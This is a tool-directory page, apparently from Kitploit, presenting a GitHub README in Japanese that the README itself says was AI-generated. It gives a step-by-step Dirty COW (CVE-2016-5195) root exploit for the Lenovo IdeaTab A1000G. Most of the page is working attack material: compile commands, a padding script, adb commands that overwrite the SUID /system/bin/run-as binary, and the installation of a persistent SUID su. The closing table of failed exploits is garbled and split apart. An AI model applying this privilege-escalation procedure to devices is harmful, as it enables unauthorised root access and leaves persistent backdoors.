Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
lenovo-a1000g-mt8317-A412_01_09_130907-kernel-3.4.0-root-cve-2016-5195 — [AI支援] Lenovo IdeaTab A1000G(MT8317、カーネル3.4.0、Android 4.1)向けのCVE-2016-5195(Dirty COW)によるRoot化手法 | Kitploit
ツール/GitHubGitHub/voidgguy/lenovo-a1000g-mt8317-a412_01_09_130907-kernel-3.4.0-root-cve-2016-5195
Androidセキュリティ特権昇格永続化メカニズムエクスプロイトポストエクスプロイトモバイルセキュリティバイナリエクスプロイト
GitHubvoidgguy/lenovo-a1000g-mt8317-a412_01_09_130907-kernel-3.4.0-root-cve-2016-5195

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

lenovo-a1000g-mt8317-A412_01_09_130907-kernel-3.4.0-root-cve-2016-5195

[AI支援] Lenovo IdeaTab A1000G(MT8317、カーネル3.4.0、Android 4.1)向けのCVE-2016-5195(Dirty COW)によるRoot化手法

リポジトリを見る
72ヶ月前未レビュー

Lenovo IdeaTab A1000G — ルート化

注意: このドキュメントとエクスプロイトコードは AI 支援 (Kiro) により生成されました。 使用前に検証してください — AI は間違いを犯すことがあります。

デバイス

項目値
モデルLenovo IdeaTab A1000G
SoCMediaTek MT8317 (= MT6517)
CPUデュアルコア Cortex-A9 @ 1.2GHz
カーネルLinux 3.4.0
ビルドA1000G_A412_01_09_130907_2G
Android4.1.2 (Jelly Bean)

前提条件

  • USB デバッグが有効
  • ADB 接続済み
  • Android NDK r28+ が ~/Android/Sdk/ndk/ にある
  • busybox-armv7l 静的バイナリ (busybox.net/downloads/binaries/1.21.1/)

エクスプロイト — CVE-2016-5195 (Dirty COW)

カーネルの mmap/write パスにおける競合状態。カーネル 2.6.22–4.8.3 に影響。 ターゲット: /system/bin/run-as (SUID root、9448 バイト)

1. コンパイル

root@kitploit:~
NDK=~/Android/Sdk/ndk/28.2.13676358/toolchains/llvm/prebuilt/linux-x86_64/bin
CC=$NDK/armv7a-linux-androideabi21-clang

# dcow exploit
$CC -o dcow -static -march=armv7-a -mfloat-abi=softfp -O1 \
    -UPRINT -UDEBUG "-DLOGV(...)=printf(__VA_ARGS__)" \
    dcow_main.c dirtycow_android.c

# su binary
$CC -o su -march=armv7-a -mfloat-abi=softfp -Os -s -fno-pie -no-pie su2_src.c

2. su をターゲットサイズ (9448 バイト) にパディング

root@kitploit:~
with open('su', 'rb') as f: data = f.read()
data = data + b'\x00' * (9448 - len(data))
with open('su_padded', 'wb') as f: f.write(data)

3. 実行

root@kitploit:~
adb push dcow su_padded su /data/local/tmp/
adb shell chmod 755 /data/local/tmp/dcow /data/local/tmp/su_padded /data/local/tmp/su
adb shell "/data/local/tmp/dcow /data/local/tmp/su_padded /system/bin/run-as"
# Wait for: [+] Success!

4. su を永続的にインストール

root@kitploit:~
# Enter root shell first
adb shell /system/bin/run-as

# Then:
mount -o remount,rw /system
toolbox dd if=/data/local/tmp/su of=/system/bin/su
toolbox chmod 6755 /system/bin/su
toolbox chown root:root /system/bin/su

5. busybox をインストール (任意)

root@kitploit:~
# From PC:
adb push busybox-armv7l /data/local/tmp/busybox

# From root shell:
toolbox dd if=/data/local/tmp/busybox of=/system/bin/busybox
toolbox chmod 755 /system/bin/busybox
/system/bin/busybox --install /system/bin/

使用方法

root@kitploit:~
adb shell
/system/bin/run-as   # drops to root shell (#)
id                   # uid=0(root)

adb shell /system/bin/su -c cmd は動作しません — ADB が setuid を破棄するため。 最初に対話型シェルに入る必要があります。

ルート化後

  • /system/bin/run-as → 上書き済み (元の run-as 機能は使用不可)
  • /system/bin/su → 永続的な SUID su バイナリ
  • /system/bin/busybox → busybox 1.21.1

失敗した試行

手法理由
CVE-2013-1763 sock_diagカーネルにコンパイルされていない
CVE-2013-6282 get_user/put_user

ファイル

root@kitploit:~
.
├── README.md
├── root.sh              # automated root script
├── dirtycow_android.c   # CVE-2016-5195 core (Arinerron fork)
├── dcow_main.c          # main() wrapper
└── su2_src.c            # su binary source

プリコンパイル済みバイナリは含まれていません — 上記の手順でソースからコンパイルしてください。

参照

  • CVE-2016-5195 ソース: Arinerron/CVE-2016-5195
  • ファームウェア ROM (別ビルド、カーネルシンボル抽出のみに使用): Lenovo_A1000G_MT6577_01_24_130329 — 両者が同じカーネル仮想レイアウトを共有するため、この ROM のシンボルはビルド A412_01_09_130907 でも動作します。
ツールをダウンロード
Cortex-A9 で ldrt/strt がブロックされる
CVE-2014-3153 Towelrootカーネルパニック — MTK では sendmmsg iovstack オフセットが誤っている
Framaroot AdbActivityNullPointerException、非互換
/proc/self/mem 上書きカーネルアドレスがユーザースペースからアクセス不可